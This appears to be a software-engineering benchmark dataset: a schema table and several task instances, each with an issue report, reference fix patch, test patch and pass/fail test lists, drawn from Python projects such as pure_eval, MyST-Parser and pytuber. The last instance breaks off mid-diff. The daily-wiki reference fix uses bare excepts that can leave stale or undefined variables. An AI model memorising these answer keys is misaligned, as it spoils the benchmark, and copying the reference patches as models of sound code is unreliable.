| Column | Type | Length / Values |
|---|---|---|
| instance_id | string | lengths 13 to 57 |
| patch | string | lengths 273 to 19.3k |
| repo | string | lengths 9 to 53 |
| base_commit | string | length 40 |
| hints_text | string | 1 class |
| test_patch | string | lengths 212 to 195k |
| problem_statement | string | lengths 40 to 7.66k |
| version | string | 1 class |
| environment_setup_commit | string | length 40 |
| FAIL_TO_PASS | list | lengths 1 to 144 |
| PASS_TO_PASS | list | lengths 0 to 1.46k |
| meta | dict | |
| created_at | string (date) | 2015-11-16 22:59:02 to 2024-04-24 11:36:26 |
| license | string | 7 classes |
| __index_level_0__ | int64 | 1 to 6.4k |
alexmojaki__pure_eval-12
|
diff --git a/.travis.yml b/.travis.yml
deleted file mode 100644
index fb89d46..0000000
--- a/.travis.yml
+++ /dev/null
@@ -1,32 +0,0 @@
-dist: xenial
-language: python
-sudo: false
-
-python:
- - 3.5
- - 3.6
- - 3.7
- - 3.8-dev
- - 3.9-dev
-
-env:
- global:
- - PURE_EVAL_SLOW_TESTS=1
- - COVERALLS_PARALLEL=true
-
-before_install:
- - pip install --upgrade coveralls setuptools>=44 setuptools_scm>=3.4.3 pep517
-
-install:
- - pip install ".[tests]"
-
-script:
- - coverage run --branch --include='pure_eval/*' -m pytest --junitxml=./rspec.xml
- - coverage report -m
-
-after_success:
- - coveralls
-
-notifications:
- webhooks: https://coveralls.io/webhook
- email: false
diff --git a/MANIFEST.in b/MANIFEST.in
index 800dfd8..09204c8 100644
--- a/MANIFEST.in
+++ b/MANIFEST.in
@@ -1,2 +1,3 @@
include LICENSE.txt
include pure_eval/py.typed
+include README.md
diff --git a/make_release.sh b/make_release.sh
index f9b8308..f0c1ac8 100755
--- a/make_release.sh
+++ b/make_release.sh
@@ -26,5 +26,5 @@ export TAG="v${1}"
git tag "${TAG}"
git push origin master "${TAG}"
rm -rf ./build ./dist
-python3 -m pep517.build -bs .
+python -m build --sdist --wheel .
twine upload ./dist/*.whl dist/*.tar.gz
diff --git a/pure_eval/core.py b/pure_eval/core.py
index 0a0381e..748f051 100644
--- a/pure_eval/core.py
+++ b/pure_eval/core.py
@@ -15,6 +15,7 @@ from pure_eval.utils import (
of_standard_types,
is_any,
of_type,
+ ensure_dict,
)
@@ -39,9 +40,9 @@ class Evaluator:
"""
return cls(ChainMap(
- frame.f_locals,
- frame.f_globals,
- frame.f_builtins,
+ ensure_dict(frame.f_locals),
+ ensure_dict(frame.f_globals),
+ ensure_dict(frame.f_builtins),
))
def __getitem__(self, node: ast.expr) -> Any:
diff --git a/pure_eval/utils.py b/pure_eval/utils.py
index 139d6dd..a8a3730 100644
--- a/pure_eval/utils.py
+++ b/pure_eval/utils.py
@@ -189,3 +189,13 @@ def copy_ast_without_context(x):
return list(map(copy_ast_without_context, x))
else:
return x
+
+
+def ensure_dict(x):
+ """
+ Handles invalid non-dict inputs
+ """
+ try:
+ return dict(x)
+ except Exception:
+ return {}
diff --git a/setup.cfg b/setup.cfg
index 330cb29..3d07ca9 100644
--- a/setup.cfg
+++ b/setup.cfg
@@ -14,6 +14,7 @@ classifiers =
Programming Language :: Python :: 3.7
Programming Language :: Python :: 3.8
Programming Language :: Python :: 3.9
+ Programming Language :: Python :: 3.10
License :: OSI Approved :: MIT License
Operating System :: OS Independent
@@ -22,7 +23,7 @@ packages = pure_eval
install_requires =
include_package_data = True
tests_require = pytest
-setup_requires = setuptools>=44; wheel; setuptools_scm[toml]>=3.4.3
+setup_requires = setuptools>=44; setuptools_scm[toml]>=3.4.3
[options.extras_require]
tests = pytest
diff --git a/tox.ini b/tox.ini
index aa83fa0..3feff03 100644
--- a/tox.ini
+++ b/tox.ini
@@ -1,5 +1,5 @@
[tox]
-envlist = py{35,36,37,38,39}
+envlist = py{35,36,37,38,39,310}
[testenv]
commands = pytest
|
alexmojaki/pure_eval
|
b5e1617805fbb1e77101de1ad372d2a0d58053ce
|
diff --git a/.github/workflows/pytest.yml b/.github/workflows/pytest.yml
new file mode 100644
index 0000000..7f68be5
--- /dev/null
+++ b/.github/workflows/pytest.yml
@@ -0,0 +1,36 @@
+name: Tests
+on: [push, pull_request]
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ strategy:
+ matrix:
+ python-version: [3.7, 3.8, 3.9, 3.10-dev]
+ steps:
+ - uses: actions/checkout@v2
+ - name: Set up Python ${{ matrix.python-version }}
+ uses: actions/setup-python@v2
+ with:
+ python-version: ${{ matrix.python-version }}
+ - name: run tests
+ env:
+ PURE_EVAL_SLOW_TESTS: 1
+ run: |
+ pip install -U pip
+ pip install --upgrade coveralls setuptools setuptools_scm pep517
+ pip install .[tests]
+ coverage run --source pure_eval -m pytest
+ coverage report -m
+ - name: Coveralls Python
+ uses: AndreMiras/coveralls-python-action@v20201129
+ with:
+ parallel: true
+ flag-name: test-${{ matrix.python-version }}
+ coveralls_finish:
+ needs: build
+ runs-on: ubuntu-latest
+ steps:
+ - name: Coveralls Finished
+ uses: AndreMiras/coveralls-python-action@v20201129
+ with:
+ parallel-finished: true
diff --git a/tests/test_utils.py b/tests/test_utils.py
index 315ecc5..172f50e 100644
--- a/tests/test_utils.py
+++ b/tests/test_utils.py
@@ -17,6 +17,7 @@ from pure_eval.utils import (
safe_name,
typing_annotation_samples,
is_standard_types,
+ ensure_dict,
)
@@ -126,3 +127,10 @@ def test_is_standard_types():
assert is_standard_types(lst, deep=False, check_dict_values=True)
assert is_standard_types(lst[0], deep=True, check_dict_values=True)
assert not is_standard_types(lst, deep=True, check_dict_values=True)
+
+
+def test_ensure_dict():
+ assert ensure_dict({}) == {}
+ assert ensure_dict([]) == {}
+ assert ensure_dict('foo') == {}
+ assert ensure_dict({'a': 1}) == {'a': 1}
|
TypeError for malformed metaclass example
In https://github.com/ipython/ipython/issues/13481, the following example used to show a fatal error in IPython:
```python
class X(type):
    def __prepare__(cls, *args, **kwargs):
        return []

class Y(metaclass=X):
    pass
```
If I try the same example with friendly-traceback, I also get a fatal error, with the following as part of a long traceback:
```
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "LOCAL:\pure_eval\core.py", line 445, in group_expressions
for node, value in expressions:
File "FRIENDLY:\info_variables.py", line 119, in <genexpr>
for nodes, obj in group_expressions(
File "LOCAL:\pure_eval\core.py", line 358, in find_expressions
value = self[node]
File "LOCAL:\pure_eval\core.py", line 68, in __getitem__
self._cache[node] = result = self._handle(node)
File "LOCAL:\pure_eval\core.py", line 89, in _handle
return self.names[node.id]
TypeError: list indices must be integers or slices, not str
```
In https://github.com/friendly-traceback/friendly-traceback/commit/276ec1b85f7c5949b0e5d1fb325b30b59b57d9c5, I've guarded against this type of fatal error.
I didn't see any evidence that the IPython crash is caused by pure_eval or another library of yours, but I thought you might want to know about it - and possibly include some safeguards in pure_eval.
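A minimal sketch of the kind of safeguard adopted in the patch above (a standalone version for illustration, not verbatim pure_eval internals): each frame namespace is coerced to a plain dict, falling back to an empty dict when the namespace object is malformed.
```python
def ensure_dict(x):
    # Coerce a namespace-like object (e.g. frame.f_locals) to a plain dict.
    # A malformed metaclass __prepare__ can make it a list instead of a mapping,
    # so fall back to an empty dict rather than raising.
    try:
        return dict(x)
    except Exception:
        return {}


assert ensure_dict({"a": 1}) == {"a": 1}
assert ensure_dict([]) == {}     # the list from the broken __prepare__ example
assert ensure_dict("foo") == {}
```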
|
0.0
|
b5e1617805fbb1e77101de1ad372d2a0d58053ce
|
[
"tests/test_utils.py::test_sys_modules",
"tests/test_utils.py::test_repr_cannot_eval",
"tests/test_utils.py::test_safe_name_types",
"tests/test_utils.py::test_safe_name_samples",
"tests/test_utils.py::test_safe_name_direct",
"tests/test_utils.py::test_is_standard_types",
"tests/test_utils.py::test_ensure_dict"
] |
[] |
{
"failed_lite_validators": [
"has_hyperlinks",
"has_removed_files",
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2022-01-22 15:31:07+00:00
|
mit
| 1,034
|
|
executablebooks__MyST-Parser-734
|
diff --git a/myst_parser/sphinx_ext/myst_refs.py b/myst_parser/sphinx_ext/myst_refs.py
index 8a4dc20..74edcb3 100644
--- a/myst_parser/sphinx_ext/myst_refs.py
+++ b/myst_parser/sphinx_ext/myst_refs.py
@@ -178,9 +178,12 @@ class MystReferenceResolver(ReferencesResolver):
)
assert self.app.builder
- ref_node = make_refnode(
- self.app.builder, from_docname, ref_docname, targetid, innernode
- )
+ try:
+ ref_node = make_refnode(
+ self.app.builder, from_docname, ref_docname, targetid, innernode
+ )
+ except NoUri:
+ ref_node = innernode
node.replace_self(ref_node)
def resolve_myst_ref_any(
|
executablebooks/MyST-Parser
|
585ce9acfb282c555e86b436fa5cdc449b80f27d
|
diff --git a/tests/test_sphinx/sourcedirs/texi_table/index.md b/tests/test_sphinx/sourcedirs/texi_table/index.md
deleted file mode 100644
index 9face4b..0000000
--- a/tests/test_sphinx/sourcedirs/texi_table/index.md
+++ /dev/null
@@ -1,3 +0,0 @@
-| foo | bar |
-| --- | --- |
-| baz | bim |
diff --git a/tests/test_sphinx/sourcedirs/texi_table/conf.py b/tests/test_sphinx/sourcedirs/texinfo/conf.py
similarity index 100%
rename from tests/test_sphinx/sourcedirs/texi_table/conf.py
rename to tests/test_sphinx/sourcedirs/texinfo/conf.py
diff --git a/tests/test_sphinx/sourcedirs/texinfo/file.md b/tests/test_sphinx/sourcedirs/texinfo/file.md
new file mode 100644
index 0000000..eeea438
--- /dev/null
+++ b/tests/test_sphinx/sourcedirs/texinfo/file.md
@@ -0,0 +1,3 @@
+---
+orphan: true
+---
diff --git a/tests/test_sphinx/sourcedirs/texinfo/index.md b/tests/test_sphinx/sourcedirs/texinfo/index.md
new file mode 100644
index 0000000..c0f15f9
--- /dev/null
+++ b/tests/test_sphinx/sourcedirs/texinfo/index.md
@@ -0,0 +1,9 @@
+Check that NoURIError is handled correctly:
+
+[](file.md)
+
+Check that tables can be built:
+
+| foo | bar |
+| --- | --- |
+| baz | bim |
diff --git a/tests/test_sphinx/test_sphinx_builds.py b/tests/test_sphinx/test_sphinx_builds.py
index b5b9acc..a41e96b 100644
--- a/tests/test_sphinx/test_sphinx_builds.py
+++ b/tests/test_sphinx/test_sphinx_builds.py
@@ -564,15 +564,11 @@ def test_fieldlist_extension(
@pytest.mark.sphinx(
buildername="texinfo",
- srcdir=os.path.join(SOURCE_DIR, "texi_table"),
+ srcdir=os.path.join(SOURCE_DIR, "texinfo"),
freshenv=True,
)
-def test_texinfo_table(
- app,
- status,
- warning,
-):
- """Test that tables can be built with the Texinfo builder."""
+def test_texinfo(app, status, warning):
+ """Test Texinfo builds."""
app.build()
assert "build succeeded" in status.getvalue() # Build succeeded
warnings = warning.getvalue().strip()
|
sphinx.errors.NoUri
### Describe the bug
**context**
I don't know whether this error relates to MyST-Parser, but I began getting this error after MyST-Parser 0.19.0 was released.
**expectation**
I expected no errors, as with my previous builds with myst v0.18.1.
https://readthedocs.org/projects/deepmd/builds/19634134/
**bug**
But instead, the `sphinx.errors.NoUri` error happens after myst v0.19.0 was released.
https://readthedocs.org/projects/deepmd/builds/19635616/
https://readthedocs.org/projects/deepmd/builds/19635930/
https://readthedocs.org/projects/deepmd/builds/19647300/
Here's an error message I ran into...
```console
Traceback (most recent call last):
File "/home/docs/checkouts/readthedocs.org/user_builds/deepmd/conda/latest/lib/python3.9/site-packages/sphinx/cmd/build.py", line 284, in build_main
app.build(args.force_all, args.filenames)
File "/home/docs/checkouts/readthedocs.org/user_builds/deepmd/conda/latest/lib/python3.9/site-packages/sphinx/application.py", line 347, in build
self.builder.build_update()
File "/home/docs/checkouts/readthedocs.org/user_builds/deepmd/conda/latest/lib/python3.9/site-packages/sphinx/builders/__init__.py", line 308, in build_update
self.build(['__all__'], to_build)
File "/home/docs/checkouts/readthedocs.org/user_builds/deepmd/conda/latest/lib/python3.9/site-packages/sphinx/builders/__init__.py", line 377, in build
self.write(docnames, list(updated_docnames), method)
File "/home/docs/checkouts/readthedocs.org/user_builds/deepmd/conda/latest/lib/python3.9/site-packages/sphinx/builders/latex/__init__.py", line 288, in write
doctree = self.assemble_doctree(
File "/home/docs/checkouts/readthedocs.org/user_builds/deepmd/conda/latest/lib/python3.9/site-packages/sphinx/builders/latex/__init__.py", line 354, in assemble_doctree
self.env.resolve_references(largetree, indexfile, self)
File "/home/docs/checkouts/readthedocs.org/user_builds/deepmd/conda/latest/lib/python3.9/site-packages/sphinx/environment/__init__.py", line 656, in resolve_references
self.apply_post_transforms(doctree, fromdocname)
File "/home/docs/checkouts/readthedocs.org/user_builds/deepmd/conda/latest/lib/python3.9/site-packages/sphinx/environment/__init__.py", line 668, in apply_post_transforms
transformer.apply_transforms()
File "/home/docs/checkouts/readthedocs.org/user_builds/deepmd/conda/latest/lib/python3.9/site-packages/sphinx/transforms/__init__.py", line 80, in apply_transforms
super().apply_transforms()
File "/home/docs/checkouts/readthedocs.org/user_builds/deepmd/conda/latest/lib/python3.9/site-packages/docutils/transforms/__init__.py", line 171, in apply_transforms
transform.apply(**kwargs)
File "/home/docs/checkouts/readthedocs.org/user_builds/deepmd/conda/latest/lib/python3.9/site-packages/sphinx/transforms/post_transforms/__init__.py", line 37, in apply
self.run(**kwargs)
File "/home/docs/checkouts/readthedocs.org/user_builds/deepmd/conda/latest/lib/python3.9/site-packages/myst_parser/sphinx_ext/myst_refs.py", line 80, in run
self.resolve_myst_ref_doc(node)
File "/home/docs/checkouts/readthedocs.org/user_builds/deepmd/conda/latest/lib/python3.9/site-packages/myst_parser/sphinx_ext/myst_refs.py", line 181, in resolve_myst_ref_doc
ref_node = make_refnode(
File "/home/docs/checkouts/readthedocs.org/user_builds/deepmd/conda/latest/lib/python3.9/site-packages/sphinx/util/nodes.py", line 550, in make_refnode
node['refuri'] = builder.get_relative_uri(fromdocname, todocname)
File "/home/docs/checkouts/readthedocs.org/user_builds/deepmd/conda/latest/lib/python3.9/site-packages/sphinx/builders/latex/__init__.py", line 141, in get_relative_uri
return self.get_target_uri(to, typ)
File "/home/docs/checkouts/readthedocs.org/user_builds/deepmd/conda/latest/lib/python3.9/site-packages/sphinx/builders/latex/__init__.py", line 135, in get_target_uri
raise NoUri(docname, typ)
sphinx.errors.NoUri: ('install/install-tf.2.8', None)
Exception occurred:
File "/home/docs/checkouts/readthedocs.org/user_builds/deepmd/conda/latest/lib/python3.9/site-packages/sphinx/builders/latex/__init__.py", line 135, in get_target_uri
raise NoUri(docname, typ)
sphinx.errors.NoUri: ('install/install-tf.2.8', None)
The full traceback has been saved in /tmp/sphinx-err-0n6n9ja3.log, if you want to report the issue to the developers.
Please also report this if it was a user error, so that a better error message can be provided next time.
A bug report can be filed in the tracker at <https://github.com/sphinx-doc/sphinx/issues>. Thanks!
```
**problem**
Indeed I don't know the reason.
### Reproduce the bug
This is my repository: https://github.com/deepmodeling/deepmd-kit/tree/devel/doc
The error happens in this file:
https://github.com/deepmodeling/deepmd-kit/blob/devel/doc/install/install-from-source.md
with this sentence:
```md
You may follow [the instruction](install-tf.2.8.md) or run the script `$deepmd_source_dir/source/install/build_tf.py` to install the corresponding C++ interface.
```
### List your environment
The error happens on the Read the Docs server.
```py
python 3.9.16
Sphinx 6.1.3
myst-parser 0.19.0
sphinx_rtd_theme 1.2.0
```
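For illustration, a minimal helper (hypothetical, not part of MyST-Parser) capturing the approach taken in the patch above: builders such as latex or texinfo may raise `NoUri` for documents they will not emit, so the resolver falls back to the bare inner node instead of crashing.
```python
from sphinx.errors import NoUri
from sphinx.util.nodes import make_refnode


def make_refnode_or_fallback(builder, from_docname, ref_docname, targetid, innernode):
    """Build a reference node, degrading to the plain inner node when the
    active builder cannot produce a URI for the target document."""
    try:
        return make_refnode(builder, from_docname, ref_docname, targetid, innernode)
    except NoUri:
        return innernode
```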
|
0.0
|
585ce9acfb282c555e86b436fa5cdc449b80f27d
|
[
"tests/test_sphinx/test_sphinx_builds.py::test_texinfo"
] |
[
"tests/test_sphinx/test_sphinx_builds.py::test_references",
"tests/test_sphinx/test_sphinx_builds.py::test_references_singlehtml",
"tests/test_sphinx/test_sphinx_builds.py::test_heading_slug_func",
"tests/test_sphinx/test_sphinx_builds.py::test_includes",
"tests/test_sphinx/test_sphinx_builds.py::test_include_from_rst",
"tests/test_sphinx/test_sphinx_builds.py::test_footnotes",
"tests/test_sphinx/test_sphinx_builds.py::test_commonmark_only",
"tests/test_sphinx/test_sphinx_builds.py::test_substitutions",
"tests/test_sphinx/test_sphinx_builds.py::test_gettext",
"tests/test_sphinx/test_sphinx_builds.py::test_gettext_html",
"tests/test_sphinx/test_sphinx_builds.py::test_gettext_additional_targets",
"tests/test_sphinx/test_sphinx_builds.py::test_mathjax_warning",
"tests/test_sphinx/test_sphinx_builds.py::test_fieldlist_extension"
] |
{
"failed_lite_validators": [
"has_hyperlinks"
],
"has_test_patch": true,
"is_lite": false
}
|
2023-03-02 05:26:24+00:00
|
mit
| 2,208
|
|
tefra__pytuber-20
|
diff --git a/pytuber/cli.py b/pytuber/cli.py
index f432978..2c7d6e6 100644
--- a/pytuber/cli.py
+++ b/pytuber/cli.py
@@ -68,6 +68,8 @@ def add():
"""Add playlist."""
+add.add_command(core.add_from_editor)
+add.add_command(core.add_from_file)
add.add_command(lastfm.add)
diff --git a/pytuber/core/commands/__init__.py b/pytuber/core/commands/__init__.py
index 27fbf7e..888f16e 100644
--- a/pytuber/core/commands/__init__.py
+++ b/pytuber/core/commands/__init__.py
@@ -7,6 +7,7 @@ from pytuber.core.commands.cmd_show import show
from pytuber.core.commands.cmd_autocomplete import autocomplete
from pytuber.core.commands.cmd_clean import clean
from pytuber.core.commands.cmd_quota import quota
+from pytuber.core.commands.cmd_add import add_from_editor, add_from_file
__all__ = [
"setup",
@@ -18,4 +19,6 @@ __all__ = [
"autocomplete",
"clean",
"quota",
+ "add_from_editor",
+ "add_from_file",
]
diff --git a/pytuber/core/commands/cmd_add.py b/pytuber/core/commands/cmd_add.py
new file mode 100644
index 0000000..e0af66b
--- /dev/null
+++ b/pytuber/core/commands/cmd_add.py
@@ -0,0 +1,97 @@
+from typing import List
+
+import click
+from tabulate import tabulate
+
+from pytuber.core.models import (
+ PlaylistManager,
+ PlaylistType,
+ Provider,
+ TrackManager,
+)
+from pytuber.lastfm.commands.cmd_add import option_title
+from pytuber.utils import magenta
+
+
+@click.command("editor")
+@option_title()
+def add_from_editor(title: str) -> None:
+ """Create playlist in a text editor."""
+ marker = (
+ "\n\n# Copy/Paste your track list and hit save!\n"
+ "# One line per track, make sure it doesn't start with a #\n"
+ "# Separate the track artist and title with a single dash `-`\n"
+ )
+ message = click.edit(marker)
+ create_playlist(title, parse_tracklist(message or ""))
+
+
+@click.command("file")
+@click.argument("file", type=click.Path(), required=True)
+@option_title()
+def add_from_file(file: str, title: str) -> None:
+ """Import a playlist from a text file."""
+
+ with open(file, "r") as fp:
+ text = fp.read()
+
+ create_playlist(title, parse_tracklist(text or ""))
+
+
+def parse_tracklist(text):
+ tracks: List[tuple] = []
+ for line in text.split("\n"):
+ line = line.strip()
+ if not line or line.startswith("#"):
+ continue
+
+ parts = line.split("-", 1)
+ if len(parts) != 2:
+ continue
+
+ artist, track = list(map(str.strip, parts))
+ if not artist or not track or (artist, track) in tracks:
+ continue
+
+ tracks.append((artist, track))
+
+ return tracks
+
+
+def create_playlist(title, tracks):
+ if not tracks:
+ return click.secho("Tracklist is empty, aborting...")
+
+ click.clear()
+ click.secho(
+ "{}\n\n{}\n".format(
+ tabulate( # type: ignore
+ [
+ (magenta("Title:"), title),
+ (magenta("Tracks:"), len(tracks)),
+ ],
+ tablefmt="plain",
+ colalign=("right", "left"),
+ ),
+ tabulate( # type: ignore
+ [
+ (i + 1, track[0], track[1])
+ for i, track in enumerate(tracks)
+ ],
+ headers=("No", "Artist", "Track Name"),
+ ),
+ )
+ )
+ click.confirm("Are you sure you want to save this playlist?", abort=True)
+ playlist = PlaylistManager.set(
+ dict(
+ type=PlaylistType.EDITOR,
+ provider=Provider.user,
+ title=title.strip(),
+ tracks=[
+ TrackManager.set(dict(artist=artist, name=name)).id
+ for artist, name in tracks
+ ],
+ )
+ )
+ click.secho("Added playlist: {}!".format(playlist.id))
diff --git a/pytuber/core/commands/s b/pytuber/core/commands/s
new file mode 100644
index 0000000..e69de29
diff --git a/pytuber/core/models.py b/pytuber/core/models.py
index 861373d..53f12c0 100644
--- a/pytuber/core/models.py
+++ b/pytuber/core/models.py
@@ -16,6 +16,14 @@ from pytuber.utils import timestamp
class Provider(enum.Enum):
lastfm = "last.fm"
youtube = "youtube"
+ user = "user"
+
+ def __str__(self):
+ return self.value
+
+
+class PlaylistType(enum.Enum):
+ EDITOR = "editor"
def __str__(self):
return self.value
diff --git a/pytuber/lastfm/commands/cmd_add.py b/pytuber/lastfm/commands/cmd_add.py
index 1fd87a3..1f451b1 100644
--- a/pytuber/lastfm/commands/cmd_add.py
+++ b/pytuber/lastfm/commands/cmd_add.py
@@ -16,7 +16,7 @@ from .cmd_fetch import fetch_tracks
@click.group("lastfm")
def add():
- """Last.fm is a music service that learns what you love."""
+ """Create playlists from Last.fm api."""
option_limit = partial(
|
tefra/pytuber
|
ae19a31c38462821ec22cd7376914ddce6a15a4f
|
diff --git a/tests/core/commands/test_cmd_add.py b/tests/core/commands/test_cmd_add.py
new file mode 100644
index 0000000..c1fdd90
--- /dev/null
+++ b/tests/core/commands/test_cmd_add.py
@@ -0,0 +1,104 @@
+from unittest import mock
+
+from pytuber import cli
+from pytuber.core.commands.cmd_add import create_playlist, parse_tracklist
+from pytuber.core.models import PlaylistManager, PlaylistType, Provider
+from tests.utils import CommandTestCase, PlaylistFixture
+
+
+class CommandAddTests(CommandTestCase):
+ @mock.patch("click.edit")
+ @mock.patch("pytuber.core.commands.cmd_add.create_playlist")
+ @mock.patch("pytuber.core.commands.cmd_add.parse_tracklist")
+ def test_add_from_editor(self, parse_tracklist, create_playlist, clk_edit):
+ clk_edit.return_value = "foo"
+ parse_tracklist.return_value = ["a", "b"]
+ self.runner.invoke(
+ cli, ["add", "editor", "--title", "My Cool Playlist"]
+ )
+ parse_tracklist.assert_called_once_with("foo")
+ create_playlist.assert_called_once_with("My Cool Playlist", ["a", "b"])
+
+ @mock.patch("pytuber.core.commands.cmd_add.create_playlist")
+ @mock.patch("pytuber.core.commands.cmd_add.parse_tracklist")
+ def test_add_from_file(self, parse_tracklist, create_playlist):
+ parse_tracklist.return_value = ["a", "b"]
+ with self.runner.isolated_filesystem():
+ with open("hello.txt", "w") as f:
+ f.write("foo")
+
+ self.runner.invoke(
+ cli,
+ ["add", "file", "hello.txt", "--title", "My Cool Playlist"],
+ )
+
+ parse_tracklist.assert_called_once_with("foo")
+ create_playlist.assert_called_once_with(
+ "My Cool Playlist", ["a", "b"]
+ )
+
+
+class CommandAddUtilsTests(CommandTestCase):
+ def test_parse_tracklist(self):
+ text = "\n".join(
+ (
+ "Queen - Bohemian Rhapsody",
+ " Queen - Bohemian Rhapsody",
+ "Queen -I want to break free",
+ "#" " ",
+ "Wrong Format",
+ )
+ )
+ actual = parse_tracklist(text)
+ expected = [
+ ("Queen", "Bohemian Rhapsody"),
+ ("Queen", "I want to break free"),
+ ]
+ self.assertEqual(expected, actual)
+
+ @mock.patch("pytuber.core.commands.cmd_add.magenta")
+ @mock.patch.object(PlaylistManager, "set")
+ @mock.patch("click.confirm")
+ @mock.patch("click.secho")
+ @mock.patch("click.clear")
+ def test_create_playlist(self, clear, secho, confirm, set, magenta):
+ magenta.side_effect = lambda x: x
+ set.return_value = PlaylistFixture.one()
+ tracks = [
+ ("Queen", "Bohemian Rhapsody"),
+ ("Queen", "I want to break free"),
+ ]
+ create_playlist("My Cool Playlist", tracks)
+
+ expected_ouput = (
+ "Title: My Cool Playlist",
+ "Tracks: 2",
+ "",
+ " No Artist Track Name",
+ "---- -------- --------------------",
+ " 1 Queen Bohemian Rhapsody",
+ " 2 Queen I want to break free",
+ )
+
+ self.assertOutput(expected_ouput, secho.call_args_list[0][0][0])
+ self.assertEqual(
+ "Added playlist: id_a!", secho.call_args_list[1][0][0]
+ )
+
+ clear.assert_called_once_with()
+ confirm.assert_called_once_with(
+ "Are you sure you want to save this playlist?", abort=True
+ )
+ set.assert_called_once_with(
+ dict(
+ type=PlaylistType.EDITOR,
+ provider=Provider.user,
+ title="My Cool Playlist",
+ tracks=["55a4d2b", "b045fee"],
+ )
+ )
+
+ @mock.patch("click.secho")
+ def test_create_playlist_empty_tracks(self, secho):
+ create_playlist("foo", [])
+ secho.assert_called_once_with("Tracklist is empty, aborting...")
|
Support raw string format
A file containing one track per line, and a direct copy/paste in the terminal.
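A short usage sketch of the `parse_tracklist` helper introduced in the patch above (assuming that patch is applied), showing the raw string format in question: one track per line, artist and title separated by a single dash, with comments and malformed lines skipped.
```python
from pytuber.core.commands.cmd_add import parse_tracklist

text = "\n".join([
    "Queen - Bohemian Rhapsody",
    "Queen - I want to break free",
    "# comment lines and blank lines are skipped",
    "Wrong Format",  # no dash separator, also skipped
])

assert parse_tracklist(text) == [
    ("Queen", "Bohemian Rhapsody"),
    ("Queen", "I want to break free"),
]
```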
|
0.0
|
ae19a31c38462821ec22cd7376914ddce6a15a4f
|
[
"tests/core/commands/test_cmd_add.py::CommandAddTests::test_add_from_editor",
"tests/core/commands/test_cmd_add.py::CommandAddTests::test_add_from_file",
"tests/core/commands/test_cmd_add.py::CommandAddUtilsTests::test_create_playlist",
"tests/core/commands/test_cmd_add.py::CommandAddUtilsTests::test_create_playlist_empty_tracks",
"tests/core/commands/test_cmd_add.py::CommandAddUtilsTests::test_parse_tracklist"
] |
[] |
{
"failed_lite_validators": [
"has_short_problem_statement",
"has_added_files",
"has_many_modified_files",
"has_many_hunks",
"has_pytest_match_arg"
],
"has_test_patch": true,
"is_lite": false
}
|
2019-02-10 17:39:49+00:00
|
mit
| 5,839
|
|
joscha0__daily-wiki-13
|
diff --git a/getwiki.py b/getwiki.py
index 395aac1..0c1db59 100644
--- a/getwiki.py
+++ b/getwiki.py
@@ -33,4 +33,4 @@ def get_wiki(language):
img = imgs[0]
img['src'] = 'http:'+img['src']
- return img, text
+ return str(img), str(text)
diff --git a/sendmail.py b/sendmail.py
index 41288e4..1538d0e 100644
--- a/sendmail.py
+++ b/sendmail.py
@@ -10,7 +10,7 @@ from getwiki import get_wiki
def send_email(img, text, email):
unsubscribe_tag = f'<a href="https://daily-wiki-newsletter.herokuapp.com/unsubscribe/{email}">unsubscribe</a>'
- msg = MIMEText(str(img) + 3*'<br>' + text + 3 *
+ msg = MIMEText(img + 3*'<br>' + text + 3 *
'<br>' + unsubscribe_tag, 'html')
msg['Subject'] = 'today wiki'
msg['From'] = 'daily-wiki@960.eu'
@@ -42,9 +42,16 @@ if __name__ == "__main__":
languages = ["en", "de", "fr", "sv", "ja", "zh"]
wikis = {}
for language in languages:
- img, text = get_wiki(language)
+ try:
+ img, text = get_wiki(language)
+ except:
+ print(f"Error getting article for {language}")
wikis[language] = (img, text)
data = firestore.getusers()
for email in data:
img, text = wikis[data[email]["language"]]
- send_email(img, text, email)
+ try:
+ send_email(img, text, email)
+ print(f"Sent email to {email}")
+ except:
+ print(f"Email failed to send to {email}")
|
joscha0/daily-wiki
|
1630910248178e4d9d865f66e7d8b186b39d1315
|
diff --git a/tests/test_getwiki.py b/tests/test_getwiki.py
new file mode 100644
index 0000000..ac45dae
--- /dev/null
+++ b/tests/test_getwiki.py
@@ -0,0 +1,28 @@
+import unittest
+from getwiki import get_wiki
+
+
+class TestFirestore(unittest.TestCase):
+
+ def test_get_wiki(self):
+ languages = ["en", "de", "fr", "sv", "ja", "zh"]
+ wikis = {}
+ for language in languages:
+ img, text = get_wiki(language)
+ wikis[language] = (img, text)
+ output = True
+ for key, value in wikis.items():
+ if output == False:
+ break
+ if not value[0].startswith('<img'):
+ print('\n\nNot an Image:'+value[0])
+ if len(value[1]) < 10:
+ print('\n\nShort Text:'+value[0])
+ self.assertIn(key, languages)
+ self.assertIsInstance(value, tuple)
+ self.assertIsInstance(value[0], str)
+ self.assertIsInstance(value[1], str)
+ self.assertTrue(len(value) == 2)
+
+ if __name__ == "__main__":
+ unittest.main()
|
Fix handling of invalid emails
If one email is invalid, sending throws an error and aborts the run:
`Traceback (most recent call last):
File "sendmail.py", line 50, in <module>
send_email(img, text, email)
File "sendmail.py", line 21, in send_email
s.sendmail(msg['From'], msg['To'], msg.as_string())
File "/app/.heroku/python/lib/python3.6/smtplib.py", line 881, in sendmail
raise SMTPRecipientsRefused(senderrs)
smtplib.SMTPRecipientsRefused: {'test@test.test': (450, b'4.1.2 <test@test.test>: Recipient address rejected: Domain not found')}
`
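A minimal sketch of the per-recipient guard the patch above introduces (the helper name is hypothetical; `send_email` and the user data come from the existing script): one rejected address is logged and skipped instead of aborting the whole run.
```python
import smtplib


def send_to_all(users, wikis, send_email):
    # users: {email: {"language": ...}}, wikis: {language: (img, text)}
    for email, info in users.items():
        img, text = wikis[info["language"]]
        try:
            send_email(img, text, email)
            print(f"Sent email to {email}")
        except smtplib.SMTPRecipientsRefused:
            # e.g. "Recipient address rejected: Domain not found" for test@test.test
            print(f"Email failed to send to {email}")
```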
|
0.0
|
1630910248178e4d9d865f66e7d8b186b39d1315
|
[
"tests/test_getwiki.py::TestFirestore::test_get_wiki"
] |
[] |
{
"failed_lite_validators": [
"has_many_modified_files"
],
"has_test_patch": true,
"is_lite": false
}
|
2020-10-21 12:46:56+00:00
|
mit
| 3,337
|
|
Turbo87__utm-31
|
diff --git a/utm/conversion.py b/utm/conversion.py
old mode 100755
new mode 100644
index d21742a..449f3d1
--- a/utm/conversion.py
+++ b/utm/conversion.py
@@ -216,13 +216,13 @@ def latlon_to_zone_number(latitude, longitude):
return 32
